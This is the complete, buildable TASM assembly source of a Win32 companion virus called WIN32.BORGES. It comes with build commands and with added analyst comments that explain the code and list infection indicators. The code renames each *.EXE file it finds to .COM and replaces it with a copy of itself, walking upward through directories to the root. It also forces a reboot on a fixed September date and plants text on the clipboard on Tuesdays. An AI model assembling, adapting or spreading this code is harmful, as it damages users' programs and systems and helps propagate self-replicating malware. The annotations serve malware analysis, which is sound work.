; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
; It mirrors EXE files, navigates directories with the famous dot-dot;
; method, on september 19 reboots the machine; on tuesdays puts a text;
; in the clipboard. This beast works using API for all its operations,;
; no dirty tricks are used. Just to maintain compatibility :);
; Dedicated to Jorge Luis Borges, because the first tale of his book;
; named "The book of sand" is called "The other", and it speaks about;
; an encounter with a younger copy of himself. The famous doppelganger.;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;
;
; Analyst notes (added on review, from this listing only):
; - Toolchain/syntax: Borland TASM (MASM-style Intel syntax), 32-bit flat
;   model, Win32 imports resolved through import32.lib. This is TASM, not
;   NASM, despite how the file is usually tagged.
; - ABI: every imported routine is Win32 stdcall -- arguments are pushed
;   right-to-left, the callee pops them, and ebx/esi/edi/ebp are preserved
;   across calls. The code depends on that for esi, which is set once at
;   ElPunto and written through much later at Done.
; - Behaviour as implemented: "companion" infection (each *.EXE of the
;   current directory is renamed to .COM and a copy of the running image
;   is put in its place), walking upward with SetCurrentDirectoryA("..");
;   two payloads keyed on GetSystemTime (month/day -> reboot, weekday ->
;   clipboard text); finally the renamed host (.COM) is started with
;   CreateProcessA and the process exits.
; - Indicators visible in this source: X.EXE -> X.COM renames immediately
;   followed by a CopyFileA of the running image, the MessageBox caption
;   string below, and the same string appearing as CF_TEXT on the
;   clipboard.

.386                                    ; 32-bit instruction set
.model flat                             ; Win32 flat memory model, single segment
locals                                  ; TASM: enable @@-prefixed local labels (none are used below)
; Win32 imports (stdcall, resolved via import32.lib at link time).
extrn FindFirstFileA:PROC               ; enumerate *.EXE in the current directory
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC         ; ".." walk, and restore of the start directory
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC                ; date / weekday payload triggers
extrn MoveFileA:PROC                    ; rename victim X.EXE -> X.COM
extrn CopyFileA:PROC                    ; copy own image into place as X.EXE
extrn GlobalAlloc:PROC                  ; clipboard payload: buffer handling
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC                ; clipboard payload: CF_TEXT placement
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC              ; source of own path and of the host command line
extrn CreateProcessA:PROC               ; start the renamed host (.COM) at the end
extrn lstrcpyA:PROC                     ; string copies (no length checks anywhere)
extrn MessageBoxA:PROC                  ; reboot payload: message, then ...
extrn ExitWindowsEx:PROC                ; ... ExitWindowsEx(EWX_REBOOT, 0)
extrn ExitProcess:PROC
.DATA

; Strings shown / planted by the payloads.
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0   ; MessageBox caption; also the clipboard text
TextoVentana db 'Made in Paraguay, South America',0    ; MessageBox body
MemHandle dd 0                          ; HGLOBAL returned by GlobalAlloc (clipboard payload)
Victimas db '*.EXE',0                   ; FindFirstFileA pattern: every EXE in the current directory
SearcHandle dd 0                        ; search handle returned by FindFirstFileA
Longitud dd 0                           ; last GetCurrentDirectoryA length; unchanged length == "root reached"
ProcessInfo dd 4 dup (0)                ; PROCESS_INFORMATION (16 bytes, correct size)
StartupInfo dd 4 dup (0)                ; STARTUPINFOA: cb left at 0 and only 16 of its 68 bytes reserved;
                                        ; CreateProcessA reads past it into the fields below
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0  ; only the first 44 bytes of WIN32_FIND_DATAA (320 bytes).
                                        ; cFileName starts at offset 44, i.e. exactly at Hallado below,
                                        ; which is how the code reads the found name; the 260-byte
                                        ; name field also runs on into Crear.
Hallado db 200 dup (0)                  ; found file name (overlays WIN32_FIND_DATAA.cFileName)
Crear db 200 dup (0)                    ; companion name: found name with its extension replaced by "COM"
ParaCorrer db 200 dup (0)               ; own path taken from the command line, cut off after the extension
Original db 200 dup (0)                 ; starting directory, restored at Salida
Actual db 200 dup (0)                   ; current directory after each ".." step
PuntoPunto db '..',0                    ; parent-directory path for SetCurrentDirectoryA
SystemTimeStruc dw 0,0,0,0,0,0,0,0      ; SYSTEMTIME: wYear,wMonth,wDayOfWeek,wDay,wHour,wMinute,wSecond,wMilliseconds
.CODE

;-----------------------------------------------------------------------
; BORGES -- program entry point ("End BORGES" at the bottom of the file).
; 1. GetSystemTime -> SystemTimeStruc (UTC). If month == 9 and day == 17
;    jump to the reboot payload at Adios. The header text says the 19th;
;    the immediate here is decimal 17.
; 2. Remember the starting directory in Original / its length in Longitud.
; 3. Copy the command line into ParaCorrer, scan to the first '.', leave
;    esi pointing at the extension and NUL-terminate three chars later
;    (i.e. right after "EXE"). esi is not touched again until Done.
; 4. Carrousell: infect the current directory, chdir "..", and repeat
;    until GetCurrentDirectoryA returns the same length as last time
;    (taken to mean the root was reached), then jump to Salida.
; Registers: edi scans strings; esi -> extension inside ParaCorrer and
; is live across every call until Done (preserved by the stdcall ABI).
;-----------------------------------------------------------------------
BORGES: mov eax,offset SystemTimeStruc
        push eax
        call GetSystemTime              ; GetSystemTime(&SystemTimeStruc)

        mov ax,word ptr offset [SystemTimeStruc+2]  ; intended: wMonth
                                        ; NOTE(review): "word ptr offset [..]" is an unusual operand form;
                                        ; confirm against the assembled bytes that it is a memory read
                                        ; and not the low word of the address.
        cmp al,9                        ; September?
        jne NoFQVbirthday

        mov ax,word ptr offset [SystemTimeStruc+6]  ; intended: wDay
        cmp al,17                       ; 17th of the month
        je Adios                        ; -> MessageBox, then ExitWindowsEx(EWX_REBOOT)

NoFQVbirthday:
        push offset Original
        push 000000C8h                  ; 200 = sizeof(Original)
        call GetCurrentDirectoryA       ; GetCurrentDirectoryA(200, Original)
        mov dword ptr [Longitud],eax    ; eax = number of characters in the path

        call GetCommandLineA
        push eax
        push offset ParaCorrer
        call lstrcpyA                   ; lstrcpyA(ParaCorrer, GetCommandLineA()); eax = ParaCorrer

        mov edi,eax
Buscar: cmp byte ptr [edi],'.'          ; find the first '.' (no bound: runs on if there is none)
        jz ElPunto
        inc edi
        jmp Buscar
ElPunto:mov esi,edi
        inc esi                         ; esi -> first char of the extension; kept for Done
        add edi,4
        mov byte ptr [edi],00           ; terminate after '.' + 3 chars -> ParaCorrer ends with ".EXE"

Carrousell:
        call InfectDirectory            ; companion-infect every *.EXE in the current directory
        push offset PuntoPunto
        call SetCurrentDirectoryA       ; SetCurrentDirectoryA("..")
        push offset Actual
        push 000000C8h
        call GetCurrentDirectoryA       ; GetCurrentDirectoryA(200, Actual)
        cmp eax,dword ptr [Longitud]    ; same length as before -> ".." did nothing -> root reached
        je Salida                       ; (only the length is compared, never the path text)
        mov dword ptr [Longitud],eax
        jmp Carrousell
;-----------------------------------------------------------------------
; InfectDirectory -- companion-infect every *.EXE in the current directory.
; Called from Carrousell. Enumerates with FindFirstFileA("*.EXE") then
; FindNextFileA until that returns FALSE, at which point it returns.
; Per match (the name is read from Hallado, which by data layout overlays
; WIN32_FIND_DATAA.cFileName):
;   Crear = found name with everything after the first '.' set to "COM",0
;   MoveFileA(Hallado, Crear)             rename X.EXE -> X.COM
;   CopyFileA(ParaCorrer+1, Hallado, 0)   own image written as X.EXE
; If FindFirstFileA returns INVALID_HANDLE_VALUE (no *.EXE here) control
; jumps straight to Salida without popping the return address, so the
; whole directory walk stops at the first directory without an EXE.
; Clobbers: eax, edi, flags. No API return value is checked.
;-----------------------------------------------------------------------
InfectDirectory:
        push offset Win32FindData
        push offset Victimas
        call FindFirstFileA             ; FindFirstFileA("*.EXE", &Win32FindData)
        mov dword ptr [SearcHandle],eax
Ciclo:  cmp eax,-1                      ; INVALID_HANDLE_VALUE (FindNextFileA returns a BOOL, so this
                                        ; only fires on the first iteration)
        je Salida                       ; abandon the traversal; return address stays on the stack
        or eax,eax                      ; FindNextFileA returned FALSE -> this directory is finished
        jnz Continuar
        ret

Continuar:
        push offset Hallado
        push offset Crear
        call lstrcpyA                   ; lstrcpyA(Crear, Hallado)

        mov edi,offset Crear
SeguirBuscando:
        cmp byte ptr [edi],'.'          ; find the first '.' of the found name (no bound check)
        jz PuntoEncontrado
        inc edi
        jmp SeguirBuscando
PuntoEncontrado:
        inc edi
        mov dword ptr [edi],0004d4f43h  ; little-endian bytes 43 4F 4D 00 = "COM",0 -> Crear = NAME.COM

        push offset Crear
        push offset Hallado
        call MoveFileA                  ; MoveFileA(Hallado, Crear): victim now NAME.COM

        push 0                          ; bFailIfExists = FALSE
        push offset Hallado
        push offset ParaCorrer+1        ; own path; +1 skips the first command-line character
                                        ; (presumably an opening quote -- TODO confirm)
        call CopyFileA                  ; CopyFileA(ParaCorrer+1, Hallado, FALSE): copy of self as NAME.EXE

        push offset Win32FindData
        push dword ptr [SearcHandle]
        call FindNextFileA              ; FindNextFileA(SearcHandle, &Win32FindData)
        jmp Ciclo
;-----------------------------------------------------------------------
; FillClipboard -- weekday payload, reached from Salida when
; SYSTEMTIME.wDayOfWeek == 2. Puts TituloVentana on the clipboard as
; CF_TEXT, then continues at Run4theNight.
; Buffer size is (offset TextoVentana - offset TituloVentana), i.e. the
; caption string including its terminating NUL (33 bytes).
; No return value is checked.
;-----------------------------------------------------------------------
FillClipboard:
        push 0
        call OpenClipboard              ; OpenClipboard(NULL)
        call EmptyClipboard
        push (offset TextoVentana-offset TituloVentana)   ; dwBytes = sizeof(TituloVentana)
        push 00000002 ; GMEM_MOVEABLE
        call GlobalAlloc                ; GlobalAlloc(GMEM_MOVEABLE, 33)
        push eax                        ; argument for GlobalLock
        mov dword ptr [MemHandle],eax   ; handle kept for SetClipboardData
        call GlobalLock                 ; eax = locked pointer
        push eax                        ; stays on the stack: becomes GlobalUnlock's argument below
        push offset TituloVentana
        push eax
        call lstrcpyA                   ; lstrcpyA(ptr, TituloVentana)
        call GlobalUnlock               ; GlobalUnlock(ptr): gets the locked pointer, not MemHandle
        push dword ptr [MemHandle]
        push 00000001 ; CF_TEXT
        call SetClipboardData           ; SetClipboardData(CF_TEXT, MemHandle)
        call CloseClipboard
        jmp Run4theNight                ; back to the common exit path
;-----------------------------------------------------------------------
; Adios -- date payload, reached from BORGES when month == 9 and day == 17.
; Shows MessageBoxA(NULL, TextoVentana, TituloVentana, 1 = MB_OKCANCEL)
; and then requests a reboot with ExitWindowsEx(EWX_REBOOT, 0).
; If ExitWindowsEx returns, execution falls through into Salida. On this
; path NoFQVbirthday was skipped, so Original/ParaCorrer are still empty
; and esi was never set; Done then writes through whatever esi holds.
;-----------------------------------------------------------------------
Adios:  push 00000001                   ; uType = MB_OKCANCEL
        push offset TituloVentana       ; lpCaption
        push offset TextoVentana        ; lpText
        push 0                          ; hWnd = NULL
        call MessageBoxA                ; MessageBoxA(0, TextoVentana, TituloVentana, 1)

        push 0                          ; dwReserved
        push 00000002 ; EWX_REBOOT
        call ExitWindowsEx              ; ExitWindowsEx(EWX_REBOOT, 0); falls into Salida if it returns
;-----------------------------------------------------------------------
; Salida -- common exit path (from Carrousell, from Ciclo, or by
; fall-through from Adios).
; 1. SetCurrentDirectoryA(Original): back to the starting directory.
; 2. Weekday payload: if SYSTEMTIME.wDayOfWeek == 2 (Tuesday; 0 = Sunday)
;    go to FillClipboard, which jumps back here to Run4theNight.
; 3. Run4theNight: CreateProcessA(ParaCorrer+1, cmdline+1, NULL, NULL,
;    FALSE, 10h = CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo,
;    &ProcessInfo). The ten arguments are pushed right-to-left; eax is
;    zeroed once ("sub eax,eax") and pushed for each NULL/FALSE slot.
; 4. Done: just before the call, "COM",0 is written through esi (set at
;    ElPunto) so ParaCorrer now names the renamed host X.COM.
; 5. ExitProcess(0).
;-----------------------------------------------------------------------
Salida: push offset Original
        call SetCurrentDirectoryA       ; SetCurrentDirectoryA(Original)

        mov ax,word ptr offset [SystemTimeStruc+4]  ; intended: wDayOfWeek (same operand form as at BORGES)
        cmp al,2                        ; Tuesday
        je FillClipboard

Run4theNight:
        push offset ProcessInfo         ; lpProcessInformation
        push offset StartupInfo         ; lpStartupInfo (cb == 0; only 16 bytes reserved)
        sub eax,eax                     ; eax = 0, reused for the NULL / FALSE slots
        push eax                        ; lpCurrentDirectory = NULL
        push eax                        ; lpEnvironment = NULL
        push 00000010h                  ; dwCreationFlags = CREATE_NEW_CONSOLE
        push eax                        ; bInheritHandles = FALSE
        push eax                        ; lpThreadAttributes = NULL
        push eax                        ; lpProcessAttributes = NULL
        call GetCommandLineA            ; eax = original command line
        inc eax                         ; skip its first character (presumably an opening quote -- TODO confirm)
        push eax                        ; lpCommandLine

Done:   mov dword ptr [esi],0004d4f43h  ; extension in ParaCorrer := "COM",0 -> renamed host X.COM
        push offset ParaCorrer+1        ; lpApplicationName (+1 as in the CopyFileA call)
        call CreateProcessA             ; start the renamed host
        push 0
        call ExitProcess                ; ExitProcess(0)

Ends                                    ; close the code segment
End BORGES                              ; entry point